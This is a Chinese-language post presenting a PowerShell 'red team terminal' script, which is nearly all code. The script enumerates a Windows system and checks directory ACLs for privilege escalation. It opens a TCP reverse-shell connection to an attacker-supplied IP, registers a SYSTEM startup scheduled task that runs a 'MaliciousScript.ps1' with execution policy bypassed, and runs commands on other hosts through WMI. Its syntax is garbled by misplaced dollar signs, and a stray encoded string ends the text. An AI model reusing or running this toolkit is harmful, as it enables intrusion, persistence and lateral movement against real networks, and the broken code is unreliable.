红队渗透利器：高级系统枚举、权限提升与持久化终端脚本本文介绍了一个名为 redteam_terminal.ps1 的 P

redteam_terminal.ps1

作者：Gerard King

描述：一个用于高级系统枚举、权限提升和持久化的一级红队操作员终端程序。

用例：渗透测试人员和红队操作员在 Windows 环境中进行对抗性演练。

标签：PowerShell，红队，渗透测试，枚举，权限提升，持久化

函数：收集详细的系统信息（例如，操作系统、用户、服务）

function Get-SystemInfo { $os = Get-CimInstance -ClassName Win32_OperatingSystem$ cpu = Get-CimInstance -ClassName Win32_Processor $services = Get-Service$ users = Get-WmiObject -Class Win32_UserAccount Write-Host "n[+] 系统信息：" Write-Host "操作系统：$($os.Caption) | 版本：$($os.Version)" Write-Host "CPU：$($cpu.Name)" Write-Host "n[+] 系统上的用户：" $users | ForEach-Object { Write-Host "用户：$ ( $_.Name) | 域：$ ( $_.Domain)" } Write-Host "`n[+] 运行中的服务："$ services | Select-Object Name, Status | Format-Table }

函数：使用 Netstat 和 PowerShell 扫描开放的端口和活动服务

function Scan-Network { Write-Host "`n[+] 网络扫描（开放端口）：" $netstat = netstat -an | Select-String "LISTENING"$ netstat | ForEach-Object { Write-Host $_.Line } }

函数：执行权限提升检查（例如，不安全的权限）

function Priv-EscalationCheck { Write-Host "n[+] 权限提升检查（不安全的权限）：" $vulnerableDirs = @("C:\Program Files", "C:\Windows\System32", "C:\Users\Public") foreach ($dir in $vulnerableDirs) { Write-Host "n检查目录： $dir" Get-Acl$ dir | Select-Object Path, Access } }

函数：启动一个反向 Shell 后门

function Start-ReverseShell { param( [string] $ip, [int]$ port ) Write-Host "`n[+] 正在启动反向 Shell 连接到 ${ip}:$ {port}" $reverseShell = New-Object System.Net.Sockets.TcpClient($ ip, $port)$ stream = $reverseShell.GetStream()$ writer = New-Object System.IO.StreamWriter( $stream)$ reader = New-Object System.IO.StreamReader( $stream) while ($ true) { $command = Read-Host "Shell 命令" if ($ command -eq "exit") { $writer.WriteLine("exit")$ writer.Flush() break } $writer.WriteLine($ command) $writer.Flush()$ response = $reader.ReadLine() Write-Host$ response } $reader.Close()$ writer.Close() $reverseShell.Close() }

函数：创建持久化机制（例如，计划任务）

function Set-Persistence { Write-Host "`n[+] 正在设置持久化（计划任务）" $taskName = "RedTeamPersistence"$ taskAction = "powershell.exe -ExecutionPolicy Bypass -File C:\Path\To\Your\MaliciousScript.ps1" $taskTrigger = New-ScheduledTaskTrigger -AtStartup$ taskActionObj = New-ScheduledTaskAction -Execute "powershell.exe" -Argument $taskAction Register-ScheduledTask -Action$ taskActionObj -Trigger $taskTrigger -TaskName$ taskName -User "NT AUTHORITY\SYSTEM" Write-Host "[+] 通过计划任务安装的持久化机制：$taskName" }

函数：发起横向移动（例如，远程 WMI 或 SMB 执行）

function Lateral-Movement { param( [string] $targetIp, [string]$ command ) Write-Host "`n[+] 正在向 ${targetIp} 发起横向移动" Invoke-WmiMethod -ComputerName$ targetIp -Class Win32_Process -Name Create -ArgumentList $command Write-Host "[+] 命令已在$ {targetIp} 上执行：${command}" }

函数：提示用户交互并执行命令

function Start-RedTeamTerminal { # Check-AdminPrivileges # 移除了管理员检查 Clear-Host Write-Host "[+] 欢迎来到红队终端。准备就绪，等待您的命令。" Write-Host "[+] 输入 'exit' 退出或输入 'help' 查看可用命令。" while ( $true) {$ input = Read-Host "输入命令" switch ( $input.ToLower()) { 'sysinfo' { Get-SystemInfo } 'network' { Scan-Network } 'priv' { Priv-EscalationCheck } 'rev' {$ ip = Read-Host "输入攻击者的 IP" $port = Read-Host "输入端口" Start-ReverseShell -ip$ ip -port $port } 'persistence' { Set-Persistence } 'lateral' {$ targetIp = Read-Host "输入目标 IP" $command = Read-Host "输入要执行的命令" Lateral-Movement -targetIp$ targetIp -command $command } 'exit' { Write-Host "[+] 正在退出红队终端。"; break } 'help' { Write-Host "`n[+] 可用命令：" Write-Host "'sysinfo' - 显示系统信息。" Write-Host "'network' - 扫描开放端口。" Write-Host "'priv' - 检查权限提升机会。" Write-Host "'rev' - 启动反向 Shell 后门。" Write-Host "'persistence' - 通过计划任务设置持久化。" Write-Host "'lateral' - 通过横向移动远程执行命令。" Write-Host "'exit' - 退出终端。" } default { Write-Host "[+] 无效命令。输入 'help' 查看可用命令。" } } } }

启动红队终端

Start-RedTeamTerminal

在关闭窗口前暂停

Read-Host "按 Enter 键退出..." CSD0tFqvECLokhw9aBeRqgzMWoT3AX/+bU4PBIwC6DhNeFb6uWAb2K1DkZza2joRR6xAJk81iZpBY/YhfptuIexMIqBLL1Tek1O1ZgDACjo=